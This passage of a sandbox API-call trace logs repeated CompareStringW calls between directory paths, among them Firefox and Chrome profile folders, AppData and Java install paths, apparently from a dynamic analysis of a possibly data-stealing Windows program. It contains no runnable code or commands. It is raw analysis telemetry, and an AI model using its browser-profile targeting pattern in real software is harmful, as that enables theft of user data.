lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount2=80) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount2=80) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount2=38) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount2=38) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount2=38) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount1=80, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount2=38) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount1=80, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount2=50) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0207.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", cchCount2=32) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", cchCount2=32) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount1=80, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", cchCount2=32) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount1=50, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", cchCount2=32) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\", cchCount2=92) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\", cchCount2=92) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", cchCount1=32, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\", cchCount2=92) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\", cchCount1=50, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\", cchCount2=92) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", cchCount1=80, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 2 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 2 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount2=43) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount2=74) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount2=74) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount2=74) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount2=74) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount2=39) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount1=74, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 2 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", cchCount1=38, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount2=43) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount2=43) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount2=43) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount2=43) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount1=74, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", 